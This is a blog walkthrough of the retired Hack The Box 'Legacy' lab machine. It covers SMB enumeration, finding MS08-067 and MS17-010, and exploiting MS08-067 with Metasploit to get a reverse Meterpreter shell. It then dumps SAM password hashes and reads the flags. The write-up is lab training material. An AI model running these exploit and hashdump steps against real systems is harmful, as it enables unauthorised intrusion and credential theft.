Hack The Box Legacy Writeup

Published:
September 6, 2024

This is a writeup for the retired Hack The Box Legacy machine.

Solution Summary

Solution

There are only four steps this time:

  1. Run Nmap, scan and fingerprint services on the machine.
  2. Probe the SMB share and identify vulnerabilities.
  3. Exploit the identified vulnerability and launch Meterpreter on the machine.
  4. Extract both user and administrator flags.

Nmap

Did you know that Nmap can also output all results as XML? It’s quite handy if you are looking to store all retrieved results while also making use of the regular console output.

nmap -sV -sC -A -oX machines/legacy/nmap.xml 10.10.10.4

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-06 08:31 JST
Nmap scan report for 10.10.10.4
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  0B        Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:1e:f0 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-09-11T04:19:15+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h17m33s, deviation: 2h07m16s, median: 4d22h47m33s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.49 seconds

Findings:

Probing Samba

I am trying out NetExec here for the first time:

netexec smb 10.10.10.4

SMB         10.10.10.4      445    LEGACY           [*] Windows 5.1 x32 (name:LEGACY) (domain:legacy) (signing:False) (SMBv1:True)

netexec smb 10.10.10.4 -u guest -p '' --shares

SMB         10.10.10.4      445    LEGACY           [-] legacy\guest: STATUS_LOGON_FAILURE

It doesn’t look like we can access the Samba share with username guest and empty password.

The SMB share here uses a really old protocol version. Extra attention has to be paid to making sure that /etc/samba/smb.conf has the following contents to ensure protocol negotiation won’t fail:

client min protocol = CORE
client max protocol = SMB3

Again, it doesn’t work in smbclient either.

smbclient -L //10.10.10.4 --user='guest' --workgroup="HTB"

Password for [HTB\guest]:
session setup failed: NT_STATUS_LOGON_FAILURE

Are there any other obvious things before we start brute-forcing passwords?

nmap --script 'smb-vuln*' -p 139,445 10.10.10.4

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-06 09:16 JST
Nmap scan report for 10.10.10.4
Host is up (0.17s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds

It looks like we can exploit at least 2 vulnerabilities here. It’s time to engage Metasploit.

Metasploit

In msfconsole, we search for applicable exploits:

search cve:2017-0143 type:exploit
# 3 results are found
search cve:2008-4250 type:exploit
# 1 result is found

We go back in history and try exploit/windows/smb/ms08_067_netapi for CVE-2008-4250:

use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.4
set LPORT 4444
set LHOST 10.10.16.2
run

Great, I don’t even know what Meterpreter is. Time to find out!

[*] Started reverse TCP handler on 10.10.16.2:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176198 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.4:1035) at 2024-09-06 09:22:16 +0900

meterpreter >

Meterpreter is a bash-light and comes with tons of useful Windows commands.

meterpreter > ls 'C:/Documents and Settings/Administrator'
Listing: C:/Documents and Settings/Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:29 +0900  Application Data
040777/rwxrwxrwx  0       dir   2017-03-16 14:32:27 +0900  Cookies
040777/rwxrwxrwx  0       dir   2017-03-16 15:18:27 +0900  Desktop
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:32 +0900  Favorites
040777/rwxrwxrwx  0       dir   2017-03-16 14:20:48 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:31 +0900  My Documents
100666/rw-rw-rw-  786432  fil   2022-05-28 19:28:03 +0900  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2024-09-11 10:31:56 +0900  NTUSER.DAT.LOG
040777/rwxrwxrwx  0       dir   2017-03-16 14:20:48 +0900  NetHood
040777/rwxrwxrwx  0       dir   2017-03-16 14:20:48 +0900  PrintHood
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:31 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:24 +0900  SendTo
040555/r-xr-xr-x  0       dir   2017-03-16 14:20:48 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-03-16 14:28:41 +0900  Templates
100666/rw-rw-rw-  178     fil   2022-05-28 19:28:03 +0900  ntuser.ini

meterpreter > ls 'C:/Documents and Settings/Administrator/Desktop'
Listing: C:/Documents and Settings/Administrator/Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:18:50 +0900  root.txt

meterpreter > cat 'C:/Documents and Settings/Administrator/Desktop/root.txt'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

I guess that’s our administrator flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Meterpreter can even dump SAM hashes! Cool!

meterpreter > hashdump
Administrator:500:b47234f31e261b47587db580d0d5f393:b1e8bd81ee9a6679befb976c0b9b6827:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:0ca071c2a387b648559a926bfe39f8d7:332e3bd65dbe0af563383faff76c6dc5:::
john:1003:dc6e5a1d0d4929c2969213afe9351474:54ee9a60735ab539438797574a9487ad:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:f2b8398cafc7174be746a74a3a7a3823:::

The other user on this machine is john:

meterpreter > ls 'C:/Documents and Settings/john/Desktop'
Listing: C:/Documents and Settings/john/Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:19:49 +0900  user.txt

meterpreter > cat 'C:/Documents and Settings/john/Desktop/user.txt'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

The user flag is: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Totally owned yo, totally not a script kiddie

Totally owned yo, totally not a script kiddie Open in new tab (full image size 22 KiB)

This cheat sheet here is very useful: https://0xdf.gitlab.io/2024/03/21/smb-cheat-sheet.html

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index